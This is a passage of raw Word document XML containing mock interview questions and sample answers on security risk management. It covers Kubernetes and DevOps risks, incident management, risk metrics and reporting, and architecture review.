      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Runtime security monitors and controls workloads while they are running. It includes detecting suspicious processes, privilege escalation, unexpected network connections, file changes, and container escapes. In Kubernetes, runtime security complements image scanning because some attacks only appear after deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the risks of Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include pulling charts from untrusted or unverified public repositories that could contain malicious templates, overly permissive default values (like disabled security contexts) that get deployed without review if teams don't inspect rendered manifests, secrets accidentally baked into values files committed to version control, and chart dependency chains that are hard to audit fully, potentially pulling in unreviewed sub-charts with their own risky defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What are Kubernetes RBAC risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include overly broad ClusterRoleBindings granting cluster-wide access when namespace-scoped access would suffice, use of the wildcard `*` in rules granting unintended permissions as the API evolves, service accounts with more permissions than their workload actually needs (violating least privilege), and stale bindings left over from decommissioned services or departed team members that nobody remembers to clean up, silently expanding the attack surface over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are the risks of privileged containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A privileged container has essentially unrestricted access to the host - it can access host devices, modify kernel parameters, and in many cases break out to gain control of the underlying node, meaning a single compromised privileged container can compromise the entire node and potentially the cluster. This is why security baselines (Pod Security Standards, admission controllers) block privileged containers by default, only allowing exceptions for genuinely justified cases like specific infrastructure-level agents with clear compensating controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 33 - Incident Management Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Describe your incident management process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I start with detection and triage, declare severity, assign roles such as incident commander and communications lead, stabilize service, communicate impact, mitigate or roll back, preserve evidence, and track timeline. After resolution, I run a blameless postmortem and convert root causes into prioritized action items.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the difference between incident, problem, and risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An incident is an unplanned event actively disrupting service that needs immediate response; a problem is the underlying root cause behind one or more incidents, addressed through investigation and permanent fix rather than urgent firefighting; a risk is a potential future event that hasn't happened yet but could cause harm, addressed through proactive mitigation before it ever becomes an incident. The distinction matters because each requires a different process - incidents need speed, problems need root-cause rigor, and risks need foresight.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you perform Root Cause Analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I build a timeline, collect logs and evidence, identify immediate cause, contributing factors, control failures, and systemic gaps. I avoid blaming individuals and focus on why the system allowed the issue. The output should include corrective actions, owners, due dates, and validation that fixes work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is a postmortem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A postmortem is a structured review after an incident. It documents what happened, impact, timeline, root causes, what went well, what did not, and action items. A good postmortem is blameless, evidence-based, and focused on preventing recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain the 5 Whys technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The 5 Whys technique repeatedly asks why an issue happened until the team reaches deeper contributing causes. For example, a service went down because a config changed; why was it wrong; why did tests miss it; why was there no approval; why did the control not exist. It helps move beyond symptoms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is a near miss?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A near miss is an event that could have caused an incident but did not, often because of luck or a late control. Near misses are valuable because they reveal weaknesses before harm occurs. They should be reviewed and tracked like risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you prevent recurring incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I prevent recurrence by identifying root causes, fixing systemic gaps, adding controls, improving monitoring, automating checks, updating runbooks, testing recovery, and tracking postmortem actions to completion. I also look for similar weaknesses in other services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What KPIs do you track?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Incident KPIs include MTTD, MTTA, MTTR, incident count by severity, recurrence rate, postmortem action closure, change failure rate, deployment frequency, rollback rate, vulnerability SLA compliance, control failure rate, and alert noise. For risk reporting, I also track KRIs and trend lines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is Mean Time to Detect (MTTD)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTD measures the average time between the start of an incident and when it is detected. Lower MTTD means monitoring and alerting are effective. To improve it, I use user-impact alerts, logs, metrics, traces, anomaly detection, and clear ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is Mean Time to Recover (MTTR)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTR measures the average time to restore service after an incident is detected or starts, depending on the definition. It improves with good runbooks, automation, rollback, tested backups, incident roles, reliable observability, and practiced response.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 34 - Risk Monitoring and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What risk metrics do you monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I monitor open risks by severity, overdue remediation, control failures, access review completion, privileged access changes, vulnerabilities by SLA, patch compliance, public exposure, backup success, logging coverage, incident recurrence, audit findings, and risk acceptances. Metrics should show both current posture and trend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What should a risk dashboard include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A good dashboard includes top risks, risk trend, KRIs, control health, overdue remediation, audit findings, exceptions, vulnerability SLA status, incident themes, cloud posture issues, and business impact. It should be role-based: executives need trends and decisions, while engineers need actionable details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you report risks to leadership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I report in business language: what can happen, what business process or customer impact is at stake, severity, trend, owner, decision needed, and timeline. I avoid deep technical detail unless needed, but I keep evidence ready. I also distinguish between accepted risk and unmanaged risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Explain Key Risk Indicators (KRIs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: KRIs are measurable signals that show increasing or decreasing risk exposure. Examples include number of critical vulnerabilities past SLA, percentage of production systems without logging, public assets discovered, privileged access exceptions, or failed backup tests. KRIs help leadership act before incidents occur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is the difference between KRIs and KPIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A KPI (Key Performance Indicator) measures how well something is performing against a goal - deployment frequency, uptime percentage, feature delivery speed. A KRI (Key Risk Indicator) measures the level of exposure to a potential future problem - number of overdue critical vulnerabilities, percentage of access reviews not completed on time - serving as an early warning signal rather than a performance measure, so a healthy KPI can coexist with a deteriorating KRI signaling trouble ahead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you monitor cloud security posture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use tools like Security Command Center, Cloud Asset Inventory, org policy reports, logging, vulnerability scans, IAM analysis, public exposure checks, IaC scanning, and SIEM correlation. I also define ownership so posture issues become tickets with SLA, not just dashboard noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What SIEM tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: If answering from experience, name the tools you used, such as Splunk, Chronicle, QRadar, Sentinel, or Elastic. A strong answer explains how logs are collected, normalized, correlated, alerted, and investigated. If I have limited hands-on experience, I would be honest and explain transferable logging and alerting work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you prioritize vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I prioritize by CVSS, exploitability, internet exposure, asset criticality, data sensitivity, compensating controls, known active exploitation, and business impact. A critical vulnerability on an internet-facing production service gets priority over the same CVE on an isolated non-production asset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is risk trending?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risk trending tracks whether risk is improving, stable, or deteriorating over time. It helps avoid one-time reporting and shows whether remediation is working. For example, a decline in overdue critical vulnerabilities is positive, while repeated public bucket findings show a systemic control gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you communicate business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I translate technical issues into outcomes such as service downtime, customer data exposure, regulatory breach, financial loss, delayed delivery, operational toil, or reputational damage. For example, instead of saying "IAM is too broad," I say "a compromised service account could access customer data across multiple projects."</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 35 - Architecture Review Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What do you review before approving an architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I review business criticality, data flows, authentication, authorization, network exposure, encryption, logging, monitoring, resilience, backup, DR, secrets, third-party dependencies, compliance needs, CI/CD, operational ownership, and incident response. I also check whether controls are testable and evidence can be produced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you evaluate third-party risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I assess the vendor's security posture, data access, compliance certifications, contract terms, SLAs, incident notification, business continuity, location of data, integration method, access model, and exit plan. I also check whether the vendor becomes a critical dependency for production or regulated data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What questions do you ask during architecture reviews?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I ask what data is processed, who can access it, what is internet-facing, what can fail, what can be abused, how secrets are handled, how logs are captured, how recovery works, how changes are deployed, and who owns operations. I also ask what assumptions have not been tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you identify single points of failure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I map dependencies across compute, database, network, DNS, identity, CI/CD, third parties, and operations. I look for components without redundancy, backups, failover, capacity alternatives, or manual workarounds. Then I validate whether failure modes have been tested through drills or incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain High Availability from a risk perspective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: High availability reduces the risk of service disruption by designing systems to survive component failures. It includes redundancy, load balancing, health checks, multi-zone or multi-region design, autoscaling, graceful degradation, and tested failover. From a risk view, HA should match business criticality and cost tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p>
